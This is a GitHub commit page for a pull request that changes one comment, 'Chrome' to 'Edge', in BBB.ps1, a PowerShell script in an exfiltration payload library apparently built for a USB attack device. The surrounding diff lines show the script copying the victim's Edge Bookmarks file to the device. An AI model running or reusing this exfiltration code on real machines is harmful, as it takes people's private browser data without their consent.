Skip to content

Commit

Permalink
Merge pull request #550 from Jeklah/patch-1
Browse files Browse the repository at this point in the history
Update BBB.ps1
  • Loading branch information
hak5glytch authored Oct 9, 2022
2 parents 1b76be7 + 3e608cd commit 7892015
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -41,7 +41,7 @@ if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Dat
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
# Copy Edge Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}
}

0 comments on commit 7892015

Please sign in to comment.